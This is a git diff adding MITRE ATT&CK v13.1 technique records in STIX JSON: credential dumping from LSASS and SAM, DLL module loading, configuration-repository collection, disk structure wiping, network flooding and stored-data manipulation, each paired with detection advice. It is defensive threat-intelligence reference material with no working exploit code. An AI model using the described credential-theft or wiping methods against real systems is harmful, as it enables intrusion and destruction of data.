b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json new file mode 100644 index 0000000000000000000000000000000000000000..a4f74b263765fcb22b65bc98d15ed1303a7c301d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json 
@@ -0,0 +1,109 @@ +{ + "type": "bundle", + "id": "bundle--effe4859-c92b-4c2c-94bd-ed1aa4ae5795", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Vincent Le Toux", + "Ed Williams, Trustwave, SpiderLabs" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "type": "attack-pattern", + "created": "2017-05-31T21:30:19.735Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1003", + "url": "https://attack.mitre.org/techniques/T1003" + }, + { + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea", + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory" + }, + { + "url": "https://github.com/mattifestation/PowerSploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "source_name": "Powersploit" + }, + { + "url": "https://msdn.microsoft.com/library/cc228086.aspx", + "description": "Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.", + "source_name": "Microsoft DRSR Dec 2017" + }, + { + "url": "https://msdn.microsoft.com/library/dd207691.aspx", + "description": "Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.", + "source_name": "Microsoft GetNCCChanges" + }, + { + "url": "https://wiki.samba.org/index.php/DRSUAPI", + "description": "SambaWiki. (n.d.). DRSUAPI. 
Retrieved December 4, 2017.", + "source_name": "Samba DRSUAPI" + }, + { + "url": "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/", + "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.", + "source_name": "Harmj0y DCSync Sept 2015" + }, + { + "url": "https://msdn.microsoft.com/library/cc237008.aspx", + "description": "Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.", + "source_name": "Microsoft NRPC Dec 2017" + }, + { + "url": "https://msdn.microsoft.com/library/cc245496.aspx", + "description": "Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.", + "source_name": "Microsoft SAMR" + }, + { + "url": "https://adsecurity.org/?p=1729", + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", + "source_name": "AdSecurity DCSync Sept 2015" + } + ], + "modified": "2022-03-08T21:00:53.436Z", + "name": "OS Credential Dumping", + "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. 
Additional custom tools likely exist as well.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). 
[PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. 
The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Access", + "Process: OS API Execution", + "Active Directory: Active Directory Object Access", + "Process: Process Access", + "Network Traffic: Network Traffic Flow", + "Command: Command Execution", + "File: File Access", + "Process: Process Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "root" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65.json new file mode 100644 index 0000000000000000000000000000000000000000..b467d21255b3757592d746687278309645bf0dab --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--65883957-ede6-411c-b76e-4b47d84ecdcd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "created": "2017-05-31T21:31:40.542Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1129", + "url": "https://attack.mitre.org/techniques/T1129" + }, + { + "source_name": "Wikipedia Windows Library Files", + "url": "https://en.wikipedia.org/wiki/Microsoft_Windows_library_files", + "description": "Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. 
of the Win32 API.(Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.", + "modified": "2022-04-19T20:31:10.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Shared Modules", + "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. 
\n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Module: Module Load", + "Process: OS API Execution" + ], + "x_mitre_remote_support": false, + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74.json new file mode 100644 index 0000000000000000000000000000000000000000..ec2a596b892286442c6ca9a0dcb82f9c453014df --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--1ab9fa2f-ea35-497d-bfd4-f6e437b677b4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "created": "2020-10-19T23:46:13.931Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1602", + "url": "https://attack.mitre.org/techniques/T1602" + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT-TA18-106A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. 
Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "modified": "2022-04-19T21:32:58.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data from Configuration Repository", + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9.json new file mode 100644 index 0000000000000000000000000000000000000000..603caf513153a41d0434102172023dde0124766f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9.json 
@@ -0,0 +1,96 @@ +{ + "type": "bundle", + "id": "bundle--825fd318-4397-4999-95db-e36e338acf4c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:38:24.089Z", + "name": "Disk Structure Wipe", + "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. 
[Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. 
Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.\n\nFor network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Driver: Driver Load", + "Drive: Drive Modification", + "Drive: Drive Access", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "created": "2020-02-20T22:10:20.484Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1561/002", + "external_id": "T1561.002" + }, + { + "source_name": "format_cmd_cisco", + "description": "Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668" + }, + { + "source_name": "Unit 42 Shamoon3 2018", + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + }, + { + "source_name": "Palo Alto Shamoon Nov 2016", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. 
Retrieved January 11, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + }, + { + "source_name": "FireEye Shamoon Nov 2016", + "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" + }, + { + "source_name": "Kaspersky StoneDrill 2017", + "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf" + }, + { + "source_name": "Microsoft Sysmon v6 May 2017", + "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon" + }, + { + "source_name": "Symantec Shamoon 2012", + "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", + "url": "https://www.symantec.com/connect/blogs/shamoon-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3.json new file mode 100644 index 0000000000000000000000000000000000000000..8dfc3b6f72ddc9eb674e6af56565b1d7fc520e30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--a5c14790-b222-4dee-8faa-b91244725679", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:53.685Z", + "name": "Direct Network Flood", + "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. 
Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. 
The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Sensor Health: Host Status" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "created": "2020-03-02T20:07:18.651Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1498/001", + "external_id": "T1498.001" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "USNYAG IranianBotnet March 2016", + "description": "Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.", + "url": "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92.json new file mode 100644 index 0000000000000000000000000000000000000000..18dce565ebb3dcef4628535411fac744fa349a24 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--a2c95ec3-95b4-4e24-93ae-21399b0bfedb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", + "type": "attack-pattern", + "created": "2019-04-09T11:51:30.942Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1492", + "url": "https://attack.mitre.org/techniques/T1492" + }, + { + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "source_name": "FireEye APT38 Oct 2018" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019." + } + ], + "modified": "2020-03-02T14:24:26.780Z", + "name": "Stored Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. 
For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root", + "SYSTEM" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a.json new file mode 100644 index 0000000000000000000000000000000000000000..0e6049a30a7313dfe8f08c333aefdae0885a28a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--7ebcae85-027a-42f0-aad8-acccfefd2fd5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "type": "attack-pattern", + "created": "2020-02-14T13:35:32.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1213.002", + "url": "https://attack.mitre.org/techniques/T1213/002" + }, + { + "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2", + "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", + "source_name": "Microsoft SharePoint Logging" + } + ], + "modified": "2021-06-08T17:10:31.187Z", + "name": "Sharepoint", + "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. 
For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Application Log: Application Log Content" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5.json new file mode 100644 index 0000000000000000000000000000000000000000..7bcbb51bc8864cf84acbd3bc122dedade12521e9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5.json 
